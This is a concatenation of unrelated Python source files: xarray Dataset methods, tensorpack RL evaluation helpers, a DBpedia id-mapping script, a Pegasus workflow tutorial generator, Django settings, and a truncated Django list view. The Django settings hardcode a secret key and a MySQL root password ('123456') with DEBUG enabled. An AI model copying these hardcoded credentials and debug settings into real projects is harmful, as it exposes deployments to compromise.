            If True, copy this dataset's attributes (`attrs`) to the result.
            If False, the new object is returned without attributes.
        args : tuple, optional
            Positional arguments passed on to `func`.
        **kwargs : dict
            Keyword arguments passed on to `func`.

        Returns
        -------
        applied : Dataset
            Resulting dataset from applying ``func`` over each data variable.
        """
        transformed = OrderedDict()
        for name, array in iteritems(self.data_vars):
            transformed[name] = maybe_wrap_array(array,
                                                 func(array, *args, **kwargs))
        new_attrs = self.attrs if keep_attrs else None
        return type(self)(transformed, attrs=new_attrs)

    def assign(self, **kwargs):
        """Return a new Dataset containing all the original variables plus the
        given new data variables.

        Parameters
        ----------
        kwargs : keyword, value pairs
            keywords name the new variables. Callable values are evaluated on
            this Dataset and the results assigned; non-callable values (e.g. a
            DataArray, scalar, or array) are assigned as-is.

        Returns
        -------
        ds : Dataset
            A new Dataset with the new variables in addition to all the
            existing variables.

        Notes
        -----
        ``kwargs`` is a dictionary, so the order of the new variables is not
        well defined. Assigning multiple variables in one ``assign`` call is
        possible, but they cannot reference each other.

        See Also
        --------
        pandas.DataFrame.assign
        """
        updated = self.copy()
        # evaluate all callables against the copy first, then assign
        computed = updated._calc_assign_results(kwargs)
        updated.update(computed)
        return updated

    def to_array(self, dim='variable', name=None):
        """Convert this dataset into an xray.DataArray

        The data variables of this dataset will be broadcast against each other
        and stacked along the first axis of the new array. All coordinates of
        this dataset will remain coordinates.

        Parameters
        ----------
        dim : str, optional
            Name of the new dimension.
        name : str, optional
            Name of the new data array.

        Returns
        -------
        array : xray.DataArray
        """
        from .dataarray import DataArray

        # Broadcast all data variables against each other ...
        data_vars = [self.variables[k] for k in self.data_vars]
        broadcast_vars = broadcast_variables(*data_vars)
        # ... then stack them along a new leading axis.
        data = ops.stack([b.data for b in broadcast_vars], axis=0)

        coords = dict(self.coords)
        # The new leading dimension is labelled with the variable names.
        coords[dim] = list(self.data_vars)

        dims = (dim,) + broadcast_vars[0].dims

        return DataArray(data, coords, dims, attrs=self.attrs, name=name)

    def _to_dataframe(self, ordered_dims):
        # Columns are all variables whose name is not itself a dimension.
        columns = [k for k in self if k not in self.dims]
        # Expand each column to the full ordered_dims and flatten it so that
        # every column has the same length.
        data = [self._variables[k].expand_dims(ordered_dims).values.reshape(-1)
                for k in columns]
        # Index is the Cartesian product of the ordered dimensions.
        index = self.coords.to_index(ordered_dims)
        return pd.DataFrame(OrderedDict(zip(columns, data)), index=index)

    def to_dataframe(self):
        """Convert this dataset into a pandas.DataFrame.

        Non-index variables in this dataset form the columns of the
        DataFrame. The DataFrame is indexed by the Cartesian product of
        this dataset's indices.
        """
        return self._to_dataframe(self.dims)

    @classmethod
    def from_dataframe(cls, dataframe):
        """Convert a pandas.DataFrame into an xray.Dataset

        Each column will be converted into an independent variable in the
        Dataset. If the dataframe's index is a MultiIndex, it will be expanded
        into a tensor product of one-dimensional indices (filling in missing
        values with NaN). This method will produce a Dataset very similar to
        that on which the 'to_dataframe' method was called, except with
        possibly redundant dimensions (since all dataset variables will have
        the same dimensionality).
        """
        # TODO: Add an option to remove dimensions along which the variables
        # are constant, to enable consistent serialization to/from a dataframe,
        # even if some variables have different dimensionality.

        idx = dataframe.index
        obj = cls()

        if hasattr(idx, 'levels'):
            # it's a multi-index
            # expand the DataFrame to include the product of all levels
            full_idx = pd.MultiIndex.from_product(idx.levels, names=idx.names)
            dataframe = dataframe.reindex(full_idx)
            # unnamed levels get synthetic names 'level_0', 'level_1', ...
            dims = [name if name is not None else 'level_%i' % n
                    for n, name in enumerate(idx.names)]
            for dim, lev in zip(dims, idx.levels):
                obj[dim] = (dim, lev)
            # N-d shape: one axis per index level
            shape = [lev.size for lev in idx.levels]
        else:
            if idx.size:
                dims = (idx.name if idx.name is not None else 'index',)
                obj[dims[0]] = (dims, idx)
            else:
                # empty index: variables get no dimensions at all
                dims = []
            # flat reshape for a simple (non-multi) index
            shape = -1

        for name, series in iteritems(dataframe):
            # after the reindex above, values are in full-product order, so a
            # plain reshape recovers the N-d block
            data = series.values.reshape(shape)
            obj[name] = (dims, data)
        return obj

    @staticmethod
    def _unary_op(f):
        # Wrap a unary function ``f`` so it applies to every data variable
        # while the coordinates are carried over untouched.
        @functools.wraps(f)
        def func(self, *args, **kwargs):
            ds = self.coords.to_dataset()
            for k in self.data_vars:
                ds._variables[k] = f(self._variables[k], *args, **kwargs)
            return ds
        return func

    @staticmethod
    def _binary_op(f, reflexive=False, join='inner', drop_na_vars=True):
        # Build a Dataset binary-operator method from ``f``.  ``reflexive``
        # implements the right-hand variants (e.g. __radd__) by swapping the
        # operands before calling ``f``.
        @functools.wraps(f)
        def func(self, other):
            if isinstance(other, groupby.GroupBy):
                # defer to the GroupBy implementation
                return NotImplemented
            if hasattr(other, 'indexes'):
                # align labelled operands before operating
                self, other = align(self, other, join=join, copy=False)
                empty_indexes = [d for d, s in self.dims.items() if s == 0]
                if empty_indexes:
                    raise ValueError('no overlapping labels for some '
                                     'dimensions: %s' % empty_indexes)
            g = f if not reflexive else lambda x, y: f(y, x)
            ds = self._calculate_binary_op(g, other, drop_na_vars=drop_na_vars)
            return ds
        return func

    @staticmethod
    def _inplace_binary_op(f):
        # Build an in-place operator method (e.g. __iadd__).  The underlying
        # arrays are NOT mutated: the op runs out-of-place and the result
        # replaces this dataset's variables.
        @functools.wraps(f)
        def func(self, other):
            if isinstance(other, groupby.GroupBy):
                raise TypeError('in-place operations between a Dataset and '
                                'a grouped object are not permitted')
            if hasattr(other, 'indexes'):
                other = other.reindex_like(self, copy=False)
            # we don't want to actually modify arrays in-place
            g = ops.inplace_to_noninplace_op(f)
            ds = self._calculate_binary_op(g, other, inplace=True)
            self._replace_vars_and_dims(ds._variables, ds._coord_names,
                                        ds._attrs, inplace=True)
            return self
        return func

    def _calculate_binary_op(self, f, other, inplace=False, drop_na_vars=True):
        # Core of Dataset arithmetic: apply ``f`` variable by variable.

        def apply_over_both(lhs_data_vars, rhs_data_vars, lhs_vars, rhs_vars):
            # Apply f to variables present on both sides; what happens to
            # one-sided variables depends on inplace/drop_na_vars.
            dest_vars = OrderedDict()
            performed_op = False
            for k in lhs_data_vars:
                if k in rhs_data_vars:
                    dest_vars[k] = f(lhs_vars[k], rhs_vars[k])
                    performed_op = True
                elif inplace:
                    raise ValueError(
                        'datasets must have the same data variables '
                        'for in-place arithmetic operations: %s, %s'
                        % (list(lhs_data_vars), list(rhs_data_vars)))
                elif not drop_na_vars:
                    # this shortcuts left alignment of variables for fillna
                    dest_vars[k] = lhs_vars[k]
            if not performed_op:
                raise ValueError(
                    'datasets have no overlapping data variables: %s, %s'
                    % (list(lhs_data_vars), list(rhs_data_vars)))
            return dest_vars

        if utils.is_dict_like(other) and not isinstance(other, Dataset):
            # can't use our shortcut of doing the binary operation with
            # Variable objects, so apply over our data vars instead.
            new_data_vars = apply_over_both(self.data_vars, other,
                                            self.data_vars, other)
            return Dataset(new_data_vars)

        # Start from the merged coordinates of both operands.
        other_coords = getattr(other, 'coords', None)
        ds = self.coords.merge(other_coords)

        if isinstance(other, Dataset):
            new_vars = apply_over_both(self.data_vars, other.data_vars,
                                       self.variables, other.variables)
        else:
            # scalar / array / DataArray: apply it against every data var
            other_variable = getattr(other, 'variable', other)
            new_vars = OrderedDict((k, f(self.variables[k], other_variable))
                                   for k in self.data_vars)

        ds._variables.update(new_vars)
        return ds


ops.inject_all_ops_and_reduce_methods(Dataset, array_only=False)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: common.py
# Author: Yuxin Wu <ppwwyyxxc@gmail.com>
import random
import time
import threading
import multiprocessing
import numpy as np
from tqdm import tqdm
from six.moves import queue

from tensorpack import *
from tensorpack.utils.concurrency import *
from tensorpack.utils.stats import *


def play_one_episode(player, func, verbose=False):
    """Play a single episode and return the mean episode reward.

    The policy picks the argmax action from ``func``'s prediction, with a
    0.1% chance of substituting a random action from the action space.
    """
    def policy(state):
        space = player.get_action_space()
        action = func([[state]])[0][0].argmax()
        # tiny exploration noise, kept even during evaluation
        if random.random() < 0.001:
            action = space.sample()
        if verbose:
            print(action)
        return action

    return np.mean(player.play_one_episode(policy))


def play_model(cfg, player):
    """Build an OfflinePredictor from ``cfg`` and let it play episodes
    forever, printing each episode's total score.  Never returns."""
    predfunc = OfflinePredictor(cfg)
    while True:
        score = play_one_episode(player, predfunc)
        print("Total:", score)


def eval_with_funcs(predictors, nr_eval, get_player_fn):
    """Evaluate ``nr_eval`` episodes using one worker thread per predictor.

    Parameters
    ----------
    predictors : list of prediction callables, one per worker thread.
    nr_eval : int, number of episodes to evaluate.
    get_player_fn : callable(train=False) -> player instance.

    Returns
    -------
    (mean, max) of the collected scores, or (0, 0) if nothing was collected.
    """
    class Worker(StoppableThread, ShareSessionThread):
        def __init__(self, func, queue):
            super(Worker, self).__init__()
            self._func = func
            self.q = queue

        def func(self, *args, **kwargs):
            # refuse to predict after stop(); unwinds run() via RuntimeError
            if self.stopped():
                raise RuntimeError("stopped!")
            return self._func(*args, **kwargs)

        def run(self):
            with self.default_sess():
                player = get_player_fn(train=False)
                while not self.stopped():
                    try:
                        score = play_one_episode(player, self.func)
                    except RuntimeError:
                        # raised by self.func once stop() was called
                        return
                    self.queue_put_stoppable(self.q, score)

    q = queue.Queue()
    threads = [Worker(f, q) for f in predictors]

    for k in threads:
        k.start()
        time.sleep(0.1)  # avoid simulator bugs
    stat = StatCounter()
    try:
        for _ in tqdm(range(nr_eval), **get_tqdm_kwargs()):
            stat.feed(q.get())
        logger.info("Waiting for all the workers to finish the last run...")
        for k in threads:
            k.stop()
        for k in threads:
            k.join()
        # drain any scores finished while the workers were stopping
        while q.qsize():
            stat.feed(q.get())
    except Exception:
        # BUG FIX: this was a bare ``except:`` combined with a ``return``
        # inside ``finally``, which silently swallowed EVERY exception,
        # including KeyboardInterrupt and SystemExit.  Now only ordinary
        # errors are logged; control-flow exceptions propagate.
        logger.exception("Eval")
    if stat.count > 0:
        return (stat.average, stat.max)
    return (0, 0)


def eval_model_multithread(cfg, nr_eval, get_player_fn):
    """Evaluate a model over ``nr_eval`` episodes with multiple prediction
    workers (half the CPU cores, capped at 8) and log mean/max scores.

    Parameters
    ----------
    cfg : predict config used to build the OfflinePredictor.
    nr_eval : int, number of evaluation episodes.
    get_player_fn : callable(train=False) -> player instance.
    """
    func = OfflinePredictor(cfg)
    NR_PROC = min(multiprocessing.cpu_count() // 2, 8)
    # renamed from ``mean, max`` -- ``max`` shadowed the builtin
    mean_score, max_score = eval_with_funcs(
        [func] * NR_PROC, nr_eval, get_player_fn)
    logger.info("Average Score: {}; Max Score: {}".format(
        mean_score, max_score))


class Evaluator(Triggerable):
    """Trigger callback that periodically evaluates the model and reports
    mean/max episode scores as scalar monitors."""

    def __init__(self, nr_eval, input_names, output_names, get_player_fn):
        # number of episodes per evaluation round; shrinks when eval is slow
        self.eval_episode = nr_eval
        self.input_names = input_names
        self.output_names = output_names
        self.get_player_fn = get_player_fn

    def _setup_graph(self):
        NR_PROC = min(multiprocessing.cpu_count() // 2, 20)
        # one shared predictor handle reused by all evaluation workers
        self.pred_funcs = [self.trainer.get_predictor(
            self.input_names, self.output_names)] * NR_PROC

    def _trigger(self):
        t = time.time()
        # renamed from ``mean, max`` -- ``max`` shadowed the builtin
        mean_score, max_score = eval_with_funcs(
            self.pred_funcs, self.eval_episode, self.get_player_fn)
        t = time.time() - t
        if t > 10 * 60:  # eval takes too long
            self.eval_episode = int(self.eval_episode * 0.94)
        self.trainer.monitors.put_scalar('mean_score', mean_score)
        self.trainer.monitors.put_scalar('max_score', max_score)


def play_n_episodes(player, predfunc, nr):
    """Play ``nr`` episodes with ``predfunc`` and print each episode score."""
    logger.info("Start evaluation: ")
    for episode in range(nr):
        # the player starts ready for the first episode; restart afterwards
        if episode:
            player.restart_episode()
        episode_score = play_one_episode(player, predfunc)
        print("{}/{}, score={}".format(episode, nr, episode_score))

# Convert DBpedia page-link URLs into integer wiki_ids.
#
# Builds a url -> wiki_id map from the page-ids dump, then rewrites each
# "<url> <predicate> <url> ." line of the input file as "<id1> <id2>".
# URLs without an official wiki_id receive fresh "local" ids starting just
# above the largest official one; that local mapping is pickled at the end.
#
# NOTE: Python 2 script (uses raw_input).
import optparse
import pickle

parser = optparse.OptionParser()
parser.add_option('-i', '--input', dest='input_file', help='input_file')
parser.add_option('-o', '--output', dest='output_file', help='output_file')

(options, args) = parser.parse_args()

if options.input_file is None:
    options.input_file = raw_input('Enter input file:')

if options.output_file is None:
    options.output_file = raw_input('Enter output file:')

input_file = options.input_file
output_file = options.output_file

# url -> official wiki_id, parsed from the DBpedia page-ids dump
wiki_from_url_dict = {}

with open('../../datasets/dbpedia/page_ids_en_2016.ttl', 'r') as f:
    for line in f:
        line = line.split(' ')
        if line[0] == '#':  # skip ttl comment lines
            continue
        url = line[0]
        # the id is the quoted literal in the object position
        wiki_id = line[2].split('"')[1]
        print(url, wiki_id)
        wiki_from_url_dict[url] = int(wiki_id)

# locally assigned ids start just above the largest official wiki_id
max_wiki_id = max(wiki_from_url_dict.values()) + 1

# url -> locally assigned id, for urls with no official wiki_id
local_id = {}


def resolve_id(url):
    """Return the id for url: the official wiki_id if known, otherwise a
    (possibly freshly assigned) local id."""
    global max_wiki_id
    if url in wiki_from_url_dict:
        return wiki_from_url_dict[url]
    if url not in local_id:
        local_id[url] = max_wiki_id
        max_wiki_id += 1
    return local_id[url]


count = 0

# BUG FIX: the output file was opened without `with` and never closed on
# error, and the id resolution was four near-identical try/except chains;
# both replaced by resolve_id() and context managers.
with open(input_file) as page_links:
    with open(output_file, 'w') as output_file_write:
        for line in page_links:
            line = line.split(' ')
            if line[0] == '#':
                continue
            wiki_id1 = resolve_id(line[0])
            wiki_id2 = resolve_id(line[2])
            output_file_write.write('%d %d\n' % (wiki_id1, wiki_id2))
            # `print count` was a Python-2-only statement; this form prints
            # the same text on Python 2 and 3
            print(count)
            count += 1

with open('../../datasets/dbpedia/local_id_to_url_full_mapping_based.p',
          'wb') as pickle_file:
    pickle.dump(local_id, pickle_file)

import errno
import os
import pwd
import shutil
import sys

from jinja2 import Environment, FileSystemLoader


class TutorialEnv:
    """Catalog of (human-readable label, machine key) pairs for the computing
    environments the tutorial can be set up for."""
    LOCAL_MACHINE = ("Local Machine Condor Pool", "submit-host")
    USC_HPCC_CLUSTER = ("USC HPCC Cluster", "usc-hpcc")
    OSG_FROM_ISI = ("OSG from ISI submit node", "osg")
    XSEDE_BOSCO = ("XSEDE, with Bosco", "xsede-bosco")
    BLUEWATERS_GLITE = ("Bluewaters, with Glite", "bw-glite")
    TACC_WRANGLER = ("TACC Wrangler with Glite", "wrangler-glite")
    OLCF_TITAN = ("OLCF TITAN with Glite", "titan-glite")
    OLCF_SUMMIT_KUBERNETES_BOSCO = (
        "OLCF Summit from Kubernetes using BOSCO",
        "summit-kub-bosco",
    )


class TutorialExample:
    """Catalog of (human-readable label, machine key) pairs for the example
    workflows the tutorial can generate."""
    PROCESS = ("Process", "process")
    PIPELINE = ("Pipeline", "pipeline")
    SPLIT = ("Split", "split")
    MERGE = ("Merge", "merge")
    EPA = ("EPA (requires R)", "r-epa")
    DIAMOND = ("Diamond", "diamond")
    CONTAINER = ("Population Modeling using Containers", "population")
    MPI = ("MPI Hello World", "mpi-hw")


def choice(question, options, default):
    "Ask the user to choose from a short list of named options"
    prompt = "{} ({}) [{}]: ".format(question, "/".join(options), default)
    while True:
        sys.stdout.write(prompt)
        reply = sys.stdin.readline().strip()
        # empty input accepts the default; anything else must match an option
        if not reply:
            return default
        if reply in options:
            return reply


def yesno(question, default="y"):
    "Ask the user a yes/no question"
    prompt = "{} (y/n) [{}]: ".format(question, default)
    while True:
        sys.stdout.write(prompt)
        # empty input falls back to the default answer
        reply = sys.stdin.readline().strip().lower() or default
        if reply == "y":
            return True
        if reply == "n":
            return False


def query(question, default=None):
    "Ask the user a question and return the response"
    while True:
        if default:
            sys.stdout.write("{} [{}]: ".format(question, default))
        else:
            sys.stdout.write("%s: " % question)
        # spaces are replaced so the value is safe to use as an identifier
        reply = sys.stdin.readline().strip().replace(" ", "_")
        if reply:
            return reply
        if default:
            return default
        # empty answer with no default: ask again


def optionlist(question, options, default=0):
    "Ask the user to choose from a list of options"
    # print the menu once, numbered from 1
    for idx, option in enumerate(options):
        print("%d: %s" % (idx + 1, option[0]))
    prompt = "%s (1-%d) [%d]: " % (question, len(options), default + 1)
    while True:
        sys.stdout.write(prompt)
        reply = sys.stdin.readline().strip()
        if not reply:
            return options[default][1]
        try:
            number = int(reply)
        except Exception:
            continue
        if 1 <= number <= len(options):
            return options[number - 1][1]


class Workflow:
    def __init__(self, workflowdir, sharedir):
        # Jinja environment rooted at the shared template directory;
        # trim_blocks drops the newline after block tags.
        self.jinja = Environment(loader=FileSystemLoader(sharedir), trim_blocks=True)
        self.name = os.path.basename(workflowdir)
        self.workflowdir = workflowdir
        self.sharedir = sharedir
        self.properties = {}
        self.home = os.environ["HOME"]
        # login name of the invoking user
        self.user = pwd.getpwuid(os.getuid())[0]
        self.tutorial = None
        self.generate_tutorial = False
        self.tutorial_setup = None
        self.compute_queue = "default"
        self.project = "MYPROJ123"
        # derive OS/arch defaults from the submit host
        sysname, _, _, _, machine = os.uname()
        if sysname == "Darwin":
            self.os = "MACOSX"
        else:
            # Probably Linux
            self.os = sysname.upper()
        self.arch = machine

    def copy_template(self, template, dest, mode=0o644):
        "Copy template to dest in workflowdir with mode"
        path = os.path.join(self.workflowdir, dest)
        t = self.jinja.get_template(template)
        # render with every instance attribute available as a template
        # variable and stream the result straight to the destination file
        t.stream(**self.__dict__).dump(path)
        os.chmod(path, mode)

    def copy_dir(self, src, dest):
        "Recursively copy src (relative to sharedir unless absolute) into workflowdir"
        # self.mkdir(dest)
        if not src.startswith("/"):
            src = os.path.join(self.sharedir, src)
        try:
            dest = os.path.join(self.workflowdir, dest)
            shutil.copytree(src, dest)
        except OSError as exc:  # python >2.5
            if exc.errno == errno.ENOTDIR:
                # src turned out to be a file -- fall back to a plain copy
                shutil.copy(src, dest)
            else:
                raise

    def mkdir(self, path):
        "Make relative directory in workflowdir"
        path = os.path.join(self.workflowdir, path)
        if not os.path.exists(path):
            os.makedirs(path)

    def configure(self):
        "Interactively collect workflow settings (tutorial or custom site)."
        # The tutorial is a special case
        if yesno("Do you want to generate a tutorial workflow?", "n"):
            self.config = "tutorial"
            self.daxgen = "tutorial"
            self.generate_tutorial = True

            # determine the environment to setup tutorial for
            self.tutorial_setup = optionlist(
                "What environment is tutorial to be setup for?",
                [
                    TutorialEnv.LOCAL_MACHINE,
                    TutorialEnv.USC_HPCC_CLUSTER,
                    TutorialEnv.OSG_FROM_ISI,
                    TutorialEnv.XSEDE_BOSCO,
                    TutorialEnv.BLUEWATERS_GLITE,
                    TutorialEnv.TACC_WRANGLER,
                    TutorialEnv.OLCF_TITAN,
                    TutorialEnv.OLCF_SUMMIT_KUBERNETES_BOSCO,
                ],
            )

            # figure out what example options to provide
            examples = [
                TutorialExample.PROCESS,
                TutorialExample.PIPELINE,
                TutorialExample.SPLIT,
                TutorialExample.MERGE,
                TutorialExample.EPA,
                TutorialExample.CONTAINER,
            ]
            # the diamond example is not offered on OSG
            if self.tutorial_setup != "osg":
                examples.append(TutorialExample.DIAMOND)

            # glite/bosco setups can also run the MPI example and need a
            # project allocation to charge jobs to
            if self.tutorial_setup in [
                "bw-glite",
                "wrangler-glite",
                "titan-glite",
                "summit-kub-bosco",
            ]:
                examples.append(TutorialExample.MPI)
                self.project = query(
                    "What project your jobs should run under. For example on TACC there are like : TG-DDM160003 ?"
                )

            self.tutorial = optionlist("What tutorial workflow do you want?", examples)

            self.setup_tutorial()
            return

        # Determine which DAX generator API to use
        self.daxgen = choice(
            "What DAX generator API do you want to use?",
            ["python", "perl", "java", "r"],
            "python",
        )

        # Determine what kind of site catalog we need to generate
        self.config = optionlist(
            "What does your computing infrastructure look like?",
            [
                ("Local Machine Condor Pool", "condorpool"),
                ("Remote Cluster using Globus GRAM", "globus"),
                ("Remote Cluster using CREAMCE", "creamce"),
                ("Local PBS Cluster with Glite", "glite"),
                ("Remote PBS Cluster with BOSCO and SSH", "bosco"),
            ],
        )

        # Find out some information about the site
        self.sitename = query("What do you want to call your compute site?", "compute")
        self.os = choice(
            "What OS does your compute site have?", ["LINUX", "MACOSX"], self.os
        )
        self.arch = choice(
            "What architecture does your compute site have?",
            ["x86_64", "x86"],
            self.arch,
        )

    def setup_tutorial(self):
        """
        Set up tutorial for pre-defined computing environments
        :return:
        """

        if self.tutorial_setup is None:
            self.tutorial_setup = "submit-host"

        if self.tutorial_setup == "submit-host":
            self.sitename = "condorpool"
        elif self.tutorial_setup == "usc-hpcc":
            self.sitename = "usc-hpcc"
            self.config = "glite"
            self.compute_queue = "quick"
            # for running the whole workflow as mpi job
            self.properties["pegasus.job.aggregator"] = "mpiexec"
        elif self.tutorial_setup == "osg":
            self.sitename = "osg"
            self.os = "linux"
            if not yesno("Do you want to use Condor file transfers", "y"):
                self.staging_site = "isi_workflow"
        elif self.tutorial_setup == "xsede-bosco":
            self.sitename = "condorpool"
        elif self.tutorial_setup == "bw-glite":
            self.sitename = "bluewaters"
            self.config = "glite"
            self.compute_queue = "normal"
        elif self.tutorial_setup == "wrangler-glite":
            self.sitename = "wrangler"
            self.config = "glite"
            self.compute_queue = "normal"
        elif self.tutorial_setup == "titan-glite":
            self.sitename = "titan"
            self.config = "glite"
            self.compute_queue = "titan"
        elif self.tutorial_setup == "summit-kub-bosco":
            self.sitename = "summit"
            self.config = "bosco"
            self.compute_queue = "batch"
        return

    def generate(self):
        """Create ``self.workflowdir`` and populate it with the templates,
        executables and input data for the selected tutorial and setup.

        Uses the ``tutorial``/``tutorial_setup``/``daxgen`` attributes set
        by ``configure()``.  Raises ``OSError`` if the directory already
        exists and ``ValueError`` for an unknown ``daxgen`` value.
        """
        os.makedirs(self.workflowdir)
        if self.tutorial != "population":
            self.mkdir("input")
        self.mkdir("output")

        if self.generate_tutorial:
            self.copy_template("%s/tc.txt" % self.tutorial, "tc.txt")

            # r-epa ships an R generator; mpi-hw installs a templated
            # daxgen.py below; all other tutorials use a plain daxgen.py.
            if self.tutorial == "r-epa":
                self.copy_template("%s/daxgen.R" % self.tutorial, "daxgen.R")
            elif self.tutorial != "mpi-hw":
                self.copy_template("%s/daxgen.py" % self.tutorial, "daxgen.py")

            if self.tutorial == "diamond":
                # Executables used by the diamond workflow
                self.mkdir("bin")
                self.copy_template(
                    "diamond/transformation.py", "bin/preprocess", mode=0o755
                )
                self.copy_template(
                    "diamond/transformation.py", "bin/findrange", mode=0o755
                )
                self.copy_template(
                    "diamond/transformation.py", "bin/analyze", mode=0o755
                )

                # Diamond input file
                self.copy_template("diamond/f.a", "input/f.a")
            elif self.tutorial == "split":
                # Split workflow input file
                self.mkdir("bin")
                self.copy_template("split/pegasus.html", "input/pegasus.html")
            elif self.tutorial == "r-epa":
                # Executables used by the R-EPA workflow
                self.mkdir("bin")
                self.copy_template(
                    "r-epa/epa-wrapper.sh", "bin/epa-wrapper.sh", mode=0o755
                )
                self.copy_template("r-epa/setupvar.R", "bin/setupvar.R", mode=0o755)
                self.copy_template(
                    "r-epa/weighted.average.R", "bin/weighted.average.R", mode=0o755
                )
                self.copy_template(
                    "r-epa/cumulative.percentiles.R",
                    "bin/cumulative.percentiles.R",
                    mode=0o755,
                )
            elif self.tutorial == "population":
                # Container definitions, scripts and data for the
                # population modeling workflow.
                self.copy_template("%s/Dockerfile" % self.tutorial, "Dockerfile")
                self.copy_template("%s/Singularity" % self.tutorial, "Singularity")
                self.copy_template(
                    "%s/tc.txt.containers" % self.tutorial, "tc.txt.containers"
                )
                self.copy_dir("%s/scripts" % self.tutorial, "scripts")
                self.copy_dir("%s/data" % self.tutorial, "input")
            elif self.tutorial == "mpi-hw":
                # Copy the MPI wrapper, C code and MPI example used by
                # the mpi-hw workflow.
                self.mkdir("bin")
                self.copy_template(
                    "%s/pegasus-mpi-hw.c" % self.tutorial, "pegasus-mpi-hw.c"
                )
                self.copy_template("%s/Makefile" % self.tutorial, "Makefile")
                self.copy_template("%s/daxgen.py.template" % self.tutorial, "daxgen.py")
                self.copy_template(
                    "%s/mpi-hello-world-wrapper" % self.tutorial,
                    "bin/mpi-hello-world-wrapper",
                    mode=0o755,
                )
                self.copy_template("split/pegasus.html", "input/f.in")

        else:
            self.copy_template("tc.txt", "tc.txt")
            if self.daxgen == "python":
                self.copy_template("daxgen/daxgen.py", "daxgen.py")
            elif self.daxgen == "perl":
                self.copy_template("daxgen/daxgen.pl", "daxgen.pl")
            elif self.daxgen == "java":
                self.copy_template("daxgen/DAXGen.java", "DAXGen.java")
            elif self.daxgen == "r":
                self.copy_template("daxgen/daxgen.R", "daxgen.R")
            else:
                # configure() should have validated daxgen already; fail
                # loudly instead of via ``assert`` (stripped under -O).
                raise ValueError("unsupported daxgen: %s" % self.daxgen)

        self.copy_template("sites.xml", "sites.xml")
        self.copy_template("plan_dax.sh", "plan_dax.sh", mode=0o755)
        self.copy_template("plan_cluster_dax.sh", "plan_cluster_dax.sh", mode=0o755)
        self.copy_template("generate_dax.sh", "generate_dax.sh", mode=0o755)
        self.copy_template("README.md", "README.md")
        self.copy_template("rc.txt", "rc.txt")
        self.copy_template("pegasus.properties", "pegasus.properties")

        if self.tutorial == "diamond":
            # Site-specific PMC wrappers.  A duplicate, unreachable
            # "wrangler-glite" elif branch was removed here (dead code).
            if self.tutorial_setup == "wrangler-glite":
                self.copy_template(
                    "pmc-wrapper.wrangler", "bin/pmc-wrapper", mode=0o755
                )
            elif self.tutorial_setup == "titan-glite":
                self.copy_template("pmc-wrapper.titan", "bin/pmc-wrapper", mode=0o755)
            elif self.tutorial_setup == "summit-kub-bosco":
                self.copy_template("pmc-wrapper.summit", "bin/pmc-wrapper", mode=0o755)

        if self.generate_tutorial:
            sys.stdout.write(
                "Pegasus Tutorial setup for example workflow - %s for execution on %s in directory %s\n"
                % (self.tutorial, self.tutorial_setup, self.workflowdir)
            )


def usage():
    """Print a one-line usage message naming this script."""
    prog = sys.argv[0]
    print("Usage: {0} WORKFLOW_DIR".format(prog))


def main(pegasus_share_dir):
    """Command-line entry point: generate a tutorial workflow directory.

    Expects exactly one positional argument (the workflow directory,
    which must not already exist); ``-h`` prints usage.  Templates are
    read from ``<pegasus_share_dir>/init``.

    Exits with status 1 on bad arguments or an existing directory.
    """
    # Single combined guard replaces two sequential checks with
    # identical outcomes (print usage, exit 1).
    if len(sys.argv) != 2 or "-h" in sys.argv:
        usage()
        exit(1)

    workflowdir = sys.argv[1]
    if os.path.exists(workflowdir):
        print("ERROR: WORKFLOW_DIR '%s' already exists" % workflowdir)
        exit(1)

    workflowdir = os.path.abspath(workflowdir)
    sharedir = os.path.join(pegasus_share_dir, "init")
    w = Workflow(workflowdir, sharedir)
    w.configure()
    w.generate()

"""
Django settings for sparta project.

For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')mg$xo^v*2mmwidr0ak6%9&!@e18v8t#7@+vd+wqg8kydb48k7'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

TEMPLATE_DEBUG = True

ALLOWED_HOSTS = []


# Application definition

INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'blog',
)

MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
)

ROOT_URLCONF = 'sparta.urls'

WSGI_APPLICATION = 'sparta.wsgi.application'


# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'USER':'root',
        'NAME':'fordjango',
        'PASSWORD':'123456',
        'HOST':'localhost',
        'PORT':''
    }
}

# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)

STATIC_ROOT = os.path.join('/home/dexter/weaponx/Django/sparta/sparta/static')

STATIC_URL = '/assets/'

STATICFILES_DIRS = (
    '/home/dexter/weaponx/Django/sparta/sparta/assets',
)
TEMPLATE_DIRS=('/home/dexter/weaponx/Django/sparta/sparta/template',)
# coding=utf8
from django.views.generic import ListView, DetailView, CreateView
from django.db.models import Q
from django.http import JsonResponse, HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.shortcuts import render
from pure_pagination.mixins import PaginationMixin
from django.contrib.auth.mixins import LoginRequiredMixin

from django.conf import settings
from books.models import Publish, Author, Book
from books.forms import PublishForm

import json
import logging

logger = logging.getLogger('opsweb')




class PublishListView(LoginRequiredMixin, PaginationMixin, ListView):
    """Publisher list view.

    Actions: getlist (GET, with optional keyword filtering) and
    create (POST via PublishForm).
    """
    model = Publish
    template_name = "books/publish_list.html"
    context_object_name = "publish_list"
    paginate_by = 5
    keyword = ''

    def get_queryset(self):
        # Filter by an optional ?keyword= parameter matched (case
        # insensitively) against name, address or city.
